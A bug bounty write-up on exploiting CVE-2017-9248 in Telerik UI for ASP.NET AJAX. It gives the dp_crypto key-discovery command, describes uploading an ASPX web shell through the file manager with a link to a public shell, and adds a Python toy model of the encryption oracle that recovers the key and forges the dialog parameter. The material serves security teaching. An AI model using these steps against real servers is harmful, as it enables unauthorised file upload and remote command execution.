Hi folks. Usually I don't do writeups or share anything related to bug bounty. From now on I will be sharing my experience and knowledge, and I hope it will add some value to your bug bounty journey ❤
Who am I?
My name is Hashir Khan, aka p4n7h3rx, and I'm a self-taught penetration tester and bug bounty hunter. I have performed penetration testing on many national and international banking, financial, government, health, and tech giant organizations.
Summary
While fuzzing a bug bounty target I saw that the website was using Telerik UI, and it was vulnerable to the Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler), through which an attacker can upload a shell via the website's file manager. I used the dp_crypto tool for exploitation.
Vulnerable Endpoint
Telerik.Web.UI.DialogHandler.aspx
Vulnerability
This exploit attacks a weak encryption implementation to discover the dialog handler key on vulnerable versions of Telerik UI for ASP.NET AJAX. With the key recovered, it produces an encrypted link that opens the file manager, and from there allows arbitrary file upload (e.g. a web shell) if the remote file permissions allow it. It works up to and including version 2017.1.118.
Run the tool in key-discovery mode (k) against the handler:
python3 dp_crypto.py k -u https://test.example.com/Telerik.Web.UI.DialogHandler.aspx
After visiting the URL that the tool prints, the Telerik file manager dialog opens.
Now upload the ASPX shell through the file manager.
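What the key-discovery step is doing under the hood, and why the encrypted link can then be forged, as an added toy model. This is not Telerik's code and not dp_crypto: it assumes a repeating-key XOR followed by a Base64-validity check on the handler side, an alphanumeric key alphabet, and placeholder names (ToyDialogHandler, recover_key, forge_dp, the <dialogParameters/> payload) that exist only in this example. Python is used because the tool itself is a Python script.

```python
"""Toy model of an XOR-keystream encryption oracle and byte-at-a-time key recovery.

Constructed illustration: this is NOT Telerik's implementation and NOT dp_crypto.
The assumed scheme is that the handler XORs the Base64-decoded dp value with a secret
key and then requires the result to be Base64 text before it does anything else. That
accept/reject decision leaks one bit per request, which is enough to recover the key
one byte at a time and then mint a dp value the handler will accept.
"""
import base64
import string

B64_CHARS = frozenset((string.ascii_letters + string.digits + "+/=").encode())
# Assumed key alphabet (alphanumeric); narrower than the real world, but enough to show the idea.
KEY_CHARSET = (string.ascii_letters + string.digits).encode()


def xor_keystream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


class ToyDialogHandler:
    """Stand-in for a handler that decrypts 'dp' and rejects anything that is not Base64 text.

    accepts() is the oracle: True when every XOR-decrypted byte is a Base64 character,
    False otherwise (a real endpoint leaks the same bit through differing error messages).
    """

    def __init__(self, key: bytes) -> None:
        self._key = key
        self.queries = 0  # how many requests the attacker had to send

    def accepts(self, dp: str) -> bool:
        self.queries += 1
        try:
            ciphertext = base64.b64decode(dp, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return False
        plaintext = xor_keystream(ciphertext, self._key)
        return all(b in B64_CHARS for b in plaintext)


def recover_key(oracle: ToyDialogHandler, key_len: int, key_charset: bytes = KEY_CHARSET) -> bytes:
    """Recover the key one byte at a time using only the accept/reject answer.

    For position pos, every earlier ciphertext byte is chosen so that it decrypts to 'A'
    (valid Base64) under the bytes already known, so the verdict depends only on whether
    probe ^ key[pos] lands in the Base64 alphabet. Each probe splits the remaining
    candidates; because the Base64 alphabet has odd size (65), no two distinct key bytes
    answer identically on all 256 probes, so the search always narrows to one value.
    Assumes the true key byte is inside key_charset; otherwise it may stop on a wrong byte
    or raise.
    """
    known = bytearray()
    for pos in range(key_len):
        prefix = bytes(ord("A") ^ k for k in known)
        candidates = set(key_charset)
        for probe in range(256):
            if len(candidates) <= 1:
                break
            dp = base64.b64encode(prefix + bytes([probe])).decode()
            answer = oracle.accepts(dp)
            candidates = {k for k in candidates if ((probe ^ k) in B64_CHARS) == answer}
        if len(candidates) != 1:
            raise ValueError(f"could not isolate key byte {pos}; check the assumed key alphabet")
        known.append(candidates.pop())
    return bytes(known)


def forge_dp(key: bytes, dialog_parameters: bytes) -> str:
    """With the key known, produce a dp value the handler accepts (the 'encrypted link' step)."""
    inner = base64.b64encode(dialog_parameters)  # the handler expects Base64 text after XOR
    return base64.b64encode(xor_keystream(inner, key)).decode()


def demo(secret_key: bytes = b"s3cr3tK3y0fTh3H4ndl3r") -> dict:
    """Run the attack against a toy server holding secret_key; returns what was learned."""
    server = ToyDialogHandler(secret_key)
    recovered = recover_key(server, len(secret_key))
    forged = forge_dp(recovered, b"<dialogParameters/>")  # constructed placeholder payload
    return {
        "recovered": recovered,
        "queries": server.queries,
        "forged_accepted": server.accepts(forged),
    }


if __name__ == "__main__":
    result = demo()
    print(f"recovered key     : {result['recovered'].decode()}")
    print(f"oracle queries    : {result['queries']}")
    print(f"forged dp accepted: {result['forged_accepted']}")
```

Running it prints the recovered key and the number of requests it took. The point is that each request leaks a bit of the key through nothing more than an accept/reject difference, which is why a crypto endpoint that answers with two distinguishable error messages deserves a second look while fuzzing. The per-byte search only trusts its result if the real key byte is inside KEY_CHARSET; widen the alphabet before believing a recovered key that does not produce an accepted forged dp.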
The shell I used:
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Final notes:
If you have any queries, feel free to reach out to me on LinkedIn or Twitter. Until then, happy hacking!